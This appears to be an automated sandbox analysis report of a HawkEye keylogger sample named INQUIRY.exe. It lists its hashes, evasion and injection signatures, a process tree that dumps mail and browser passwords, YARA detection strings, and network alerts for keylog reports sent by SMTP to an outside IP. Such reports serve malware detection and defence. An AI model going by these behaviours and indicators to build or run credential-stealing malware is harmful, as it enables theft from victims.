

Analysis Report INQUIRY.exe

Overview

General Information

Sample Name: INQUIRY.exe
Analysis ID: 319686
MD5: 0b940145d7d02e5b1b975c99dd5197a4
SHA1: 53ae0b576f7b362b90a25ace1470d33068db4490
SHA256: bf487ff7cdbbd998b633b1858a939d8c808bcce65ab9937695475b39deea70a8
Tags: exe, HawkEye

Detection

HawkEye MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected HawkEye Rat
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected HawkEye Keylogger
Yara detected MailPassView
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Allocates memory in foreign processes
Changes the view of files in windows explorer (hidden files and folders)
Contains functionality to detect sleep reduction / modifications
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Sample uses process hollowing technique
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores large binary data to the registry
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Startup

  • System is w10x64
  • INQUIRY.exe (PID: 2016 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' MD5: 0B940145D7D02E5B1B975C99DD5197A4)
    • INQUIRY.exe (PID: 5896 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' MD5: 0B940145D7D02E5B1B975C99DD5197A4)
      • dw20.exe (PID: 6868 cmdline: dw20.exe -x -s 2308 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
      • vbc.exe (PID: 6664 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • vbc.exe (PID: 6700 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
      • WerFault.exe (PID: 6776 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5896 -s 2216 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • INQUIRY.exe (PID: 5788 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 5896 5358953 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
      • INQUIRY.exe (PID: 6076 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
        • INQUIRY.exe (PID: 6808 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
          • dw20.exe (PID: 6936 cmdline: dw20.exe -x -s 2272 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
          • vbc.exe (PID: 5684 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • vbc.exe (PID: 4184 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
          • WerFault.exe (PID: 1076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6808 -s 2324 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
        • INQUIRY.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 6808 5404546 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
          • INQUIRY.exe (PID: 6400 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
            • INQUIRY.exe (PID: 240 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
              • dw20.exe (PID: 204 cmdline: dw20.exe -x -s 2100 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
            • INQUIRY.exe (PID: 6428 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 240 5445406 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
              • INQUIRY.exe (PID: 6900 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
                • INQUIRY.exe (PID: 1364 cmdline: C:\Users\user\Desktop\INQUIRY.exe MD5: 0B940145D7D02E5B1B975C99DD5197A4)
                  • dw20.exe (PID: 6380 cmdline: dw20.exe -x -s 2284 MD5: 8D10DA8A3E11747E51F23C882C22BBC3)
                  • vbc.exe (PID: 5396 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
                  • vbc.exe (PID: 3064 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: C63ED21D5706A527419C9FBD730FFB2E)
                  • WerFault.exe (PID: 7076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1364 -s 2096 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
                • INQUIRY.exe (PID: 4424 cmdline: 'C:\Users\user\Desktop\INQUIRY.exe' 2 1364 5460187 MD5: 0B940145D7D02E5B1B975C99DD5197A4)
  • cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x59d3e3:$key: HawkEyeKeylogger
  • 0x59f613:$salt: 099u787978786
  • 0x59da24:$string1: HawkEye_Keylogger
  • 0x59e863:$string1: HawkEye_Keylogger
  • 0x59f573:$string1: HawkEye_Keylogger
  • 0x59ddf9:$string2: holdermail.txt
  • 0x59de19:$string2: holdermail.txt
  • 0x59dd3b:$string3: wallet.dat
  • 0x59dd53:$string3: wallet.dat
  • 0x59dd69:$string3: wallet.dat
  • 0x59f137:$string4: Keylog Records
  • 0x59f44f:$string4: Keylog Records
  • 0x59f66b:$string5: do not script -->
  • 0x59d3cb:$string6: \pidloc.txt
  • 0x59d459:$string7: BSPLIT
  • 0x59d469:$string7: BSPLIT
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
C:\ProgramData\Microsoft\Windows\WER\Temp\WERAB44.tmp.mdmp | Hawkeye | detect HawkEye in memory | JPCERT/CC Incident Response Group
  • 0x59da7c:$hawkstr1: HawkEye Keylogger
  • 0x59e8a9:$hawkstr1: HawkEye Keylogger
  • 0x59ebd8:$hawkstr1: HawkEye Keylogger
  • 0x59ed33:$hawkstr1: HawkEye Keylogger
  • 0x59ee96:$hawkstr1: HawkEye Keylogger
  • 0x59f10f:$hawkstr1: HawkEye Keylogger
  • 0x59d60a:$hawkstr2: Dear HawkEye Customers!
  • 0x59ec2b:$hawkstr2: Dear HawkEye Customers!
  • 0x59ed82:$hawkstr2: Dear HawkEye Customers!
  • 0x59eee9:$hawkstr2: Dear HawkEye Customers!
  • 0x59d72b:$hawkstr3: HawkEye Logger Details:
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x5a504d:$key: HawkEyeKeylogger
  • 0x5a727d:$salt: 099u787978786
  • 0x5a568e:$string1: HawkEye_Keylogger
  • 0x5a64cd:$string1: HawkEye_Keylogger
  • 0x5a71dd:$string1: HawkEye_Keylogger
  • 0x5a5a63:$string2: holdermail.txt
  • 0x5a5a83:$string2: holdermail.txt
  • 0x5a59a5:$string3: wallet.dat
  • 0x5a59bd:$string3: wallet.dat
  • 0x5a59d3:$string3: wallet.dat
  • 0x5a6da1:$string4: Keylog Records
  • 0x5a70b9:$string4: Keylog Records
  • 0x5a72d5:$string5: do not script -->
  • 0x5a5035:$string6: \pidloc.txt
  • 0x5a50c3:$string7: BSPLIT
  • 0x5a50d3:$string7: BSPLIT
C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security

Memory Dumps

Source | Rule | Description | Author | Strings
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x7b89c:$key: HawkEyeKeylogger
  • 0x7dacc:$salt: 099u787978786
  • 0x7bedd:$string1: HawkEye_Keylogger
  • 0x7cd1c:$string1: HawkEye_Keylogger
  • 0x7da2c:$string1: HawkEye_Keylogger
  • 0x7c2b2:$string2: holdermail.txt
  • 0x7c2d2:$string2: holdermail.txt
  • 0x7c1f4:$string3: wallet.dat
  • 0x7c20c:$string3: wallet.dat
  • 0x7c222:$string3: wallet.dat
  • 0x7d5f0:$string4: Keylog Records
  • 0x7d908:$string4: Keylog Records
  • 0x7db24:$string5: do not script -->
  • 0x7b884:$string6: \pidloc.txt
  • 0x7b912:$string7: BSPLIT
  • 0x7b922:$string7: BSPLIT
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | Hawkeye | detect HawkEye in memory | JPCERT/CC Incident Response Group
  • 0x7bf35:$hawkstr1: HawkEye Keylogger
  • 0x7cd62:$hawkstr1: HawkEye Keylogger
  • 0x7d091:$hawkstr1: HawkEye Keylogger
  • 0x7d1ec:$hawkstr1: HawkEye Keylogger
  • 0x7d34f:$hawkstr1: HawkEye Keylogger
  • 0x7d5c8:$hawkstr1: HawkEye Keylogger
  • 0x7bac3:$hawkstr2: Dear HawkEye Customers!
  • 0x7d0e4:$hawkstr2: Dear HawkEye Customers!
  • 0x7d23b:$hawkstr2: Dear HawkEye Customers!
  • 0x7d3a2:$hawkstr2: Dear HawkEye Customers!
  • 0x7bbe4:$hawkstr3: HawkEye Logger Details:

Unpacked PEs

Source | Rule | Description | Author | Strings
5.2.vbc.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
16.1.INQUIRY.exe.400000.0.unpack | RAT_HawkEye | Detects HawkEye RAT | Kevin Breen <kevin@techanarchy.net>
  • 0x112984:$key: HawkEyeKeylogger
  • 0x114bb4:$salt: 099u787978786
  • 0x112fc5:$string1: HawkEye_Keylogger
  • 0x113e04:$string1: HawkEye_Keylogger
  • 0x114b14:$string1: HawkEye_Keylogger
  • 0x11339a:$string2: holdermail.txt
  • 0x1133ba:$string2: holdermail.txt
  • 0x1132dc:$string3: wallet.dat
  • 0x1132f4:$string3: wallet.dat
  • 0x11330a:$string3: wallet.dat
  • 0x1146d8:$string4: Keylog Records
  • 0x1149f0:$string4: Keylog Records
  • 0x114c0c:$string5: do not script -->
  • 0x11296c:$string6: \pidloc.txt
  • 0x1129fa:$string7: BSPLIT
  • 0x112a0a:$string7: BSPLIT
16.1.INQUIRY.exe.400000.0.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
16.1.INQUIRY.exe.400000.0.unpack | JoeSecurity_HawkEye | Yara detected HawkEye Keylogger | Joe Security
16.1.INQUIRY.exe.400000.0.unpack | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security

Sigma Overview

No Sigma rule has matched

Signature Overview



AV Detection:

Found malware configuration
Source: vbc.exe.6700.6.memstr | Malware Configuration Extractor: HawkEye {"Modules": ["WebBrowserPassView"], "Version": ""}
Multi AV Scanner detection for submitted file
Source: INQUIRY.exe | Virustotal: Detection: 43%
Source: INQUIRY.exe | ReversingLabs: Detection: 41%
Machine Learning detection for sample
Source: INQUIRY.exe | Joe Sandbox ML: detected
Source: 16.2.INQUIRY.exe.22e0000.1.unpack | Avira: Label: TR/Inject.vcoldi
Source: 32.2.INQUIRY.exe.2680000.3.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 32.2.INQUIRY.exe.2680000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 1.2.INQUIRY.exe.21e0000.1.unpack | Avira: Label: TR/Inject.vcoldi
Source: 1.2.INQUIRY.exe.2270000.2.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 1.2.INQUIRY.exe.2270000.2.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 16.2.INQUIRY.exe.2370000.2.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 16.2.INQUIRY.exe.2370000.2.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.INQUIRY.exe.2640000.3.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 0.2.INQUIRY.exe.2640000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 27.2.INQUIRY.exe.2640000.3.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 27.2.INQUIRY.exe.2640000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 33.2.INQUIRY.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 33.2.INQUIRY.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 0.2.INQUIRY.exe.25f0000.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.INQUIRY.exe.22f0000.3.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 28.2.INQUIRY.exe.22f0000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 33.2.INQUIRY.exe.22f0000.2.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 33.2.INQUIRY.exe.22f0000.2.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 1.2.INQUIRY.exe.2300000.3.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 1.2.INQUIRY.exe.2300000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 16.2.INQUIRY.exe.2490000.3.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 16.2.INQUIRY.exe.2490000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 33.2.INQUIRY.exe.2210000.1.unpack | Avira: Label: TR/Inject.vcoldi
Source: 28.2.INQUIRY.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 28.2.INQUIRY.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 13.2.INQUIRY.exe.2660000.3.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 13.2.INQUIRY.exe.2660000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 33.2.INQUIRY.exe.2380000.3.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 33.2.INQUIRY.exe.2380000.3.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 32.2.INQUIRY.exe.2630000.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.INQUIRY.exe.7a0000.1.unpack | Avira: Label: TR/Inject.vcoldi
Source: 16.2.INQUIRY.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 16.2.INQUIRY.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 27.2.INQUIRY.exe.25e0000.2.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 28.2.INQUIRY.exe.2240000.2.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 28.2.INQUIRY.exe.2240000.2.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: 1.2.INQUIRY.exe.400000.0.unpack | Avira: Label: TR/AD.MExecute.lzrac
Source: 1.2.INQUIRY.exe.400000.0.unpack | Avira: Label: SPR/Tool.MailPassView.473
Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp | Binary or memory string: autorun.inf
Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp | Binary or memory string: [autorun]
Source: INQUIRY.exe | Binary or memory string: [autorun]
Source: INQUIRY.exe | Binary or memory string: autorun.inf
Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp | Binary or memory string: autorun.inf
Source: WerFault.exe, 00000009.00000002.731445229.0000000005040000.00000004.00000001.sdmp | Binary or memory string: [autorun]
Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp | Binary or memory string: autorun.inf
Source: INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp | Binary or memory string: [autorun]
Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | Binary or memory string: autorun.inf
Source: INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp | Binary or memory string: [autorun]
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_004089B8 FindFirstFileA,GetLastError,
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 0_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 2_2_004089B8 FindFirstFileA,GetLastError,
Source: C:\Users\user\Desktop\INQUIRY.exe | Code function: 2_2_00405AE8 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 5_2_00406EC3 FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00408441 FindFirstFileW,FindNextFileW,wcslen,wcslen,
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | Code function: 6_2_00407E0E FindFirstFileW,FindNextFileW,FindClose,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49750 -> 166.62.27.57:587
Source: Traffic | Snort IDS: 2019926 ET TROJAN HawkEye Keylogger Report SMTP 192.168.2.4:49774 -> 166.62.27.57:587
May check the online IP address of the machine
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: unknownDNS query: name: whatismyipaddress.com
                    Source: global traffic | TCP traffic: 192.168.2.4:49750 -> 166.62.27.57:587
                    Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: whatismyipaddress.com Connection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 104.16.154.36
                    Source: Joe Sandbox View | ASN Name: AS-26496-GO-DADDY-COM-LLCUS
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
                    Source: INQUIRY.exe, 00000000.00000002.656291540.0000000002642000.00000040.00000001.sdmp, INQUIRY.exe, 00000001.00000002.741822453.0000000003A41000.00000004.00000001.sdmp, vbc.exe, 00000006.00000002.695692485.0000000000400000.00000040.00000001.sdmp, INQUIRY.exe, 0000000D.00000002.756918468.0000000002662000.00000040.00000001.sdmp, INQUIRY.exe, 00000010.00000002.825855451.00000000022E0000.00000004.00000001.sdmp, vbc.exe, 00000014.00000002.774520700.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @nss3.dllSOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\seamonkey.exe%programfiles%\Sea MonkeySOFTWARE\Mozillamozilla%s\binPathToExe%programfiles%\Mozilla FirefoxSELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins.---signons.txtsignons2.txtsignons3.txtsignons.sqlitenetmsg.dllUnknown Error\Error %d: %seditkernel32.dll... open %2.2X %s (%s)Microsoft_WinInetMicrosoft_WinInet_u7@dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
                    Source: INQUIRY.exe, vbc.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmp | String found in binary or memory: ttps://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4421591https://consent.google.com/about:blankhttps://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=4510094152711;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fthank-you.html%3Fstatcb%3D0%26installdataindex%3Dempty%26defaultbrowser%3D0https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2F?https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login=37&ndec=1&cid=8HBI57XIG&prvid=77%2C184%2C188%2C226&rtime=3&https=1&usp_status=0&usp_consent=1&dcfp=gdpr,usphttps://www.microsoft.com/en-us/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edge/https://www.microsoft.com/en-us/welcomeie11/https://www.microsoft.com/en-us/edge?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/en-us/edgehttps://www.microsoft.com/edge/?form=MA13DL&OCID=MA13DLhttps://www.microsoft.com/edge/https://adservice.google.com/ddm/fls/i/src=2542116;type=2542116;cat=chom0;ord=8072167097284;gtm=2wg9g1;~oref=https%3A%2F%2Fwww.google.com%2Fintl%2Fen_uk%2Fchrome%2Fhttps://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.google.com&gl=GB&pc=s&uxe=4421591 equals www.facebook.com (Facebook)
                    Source: vbc.exe, 00000006.00000002.696465332.000000000084E000.00000004.00000040.sdmp, vbc.exe, 00000014.00000002.775214194.0000000000A2E000.00000004.00000040.sdmp | String found in binary or memory: 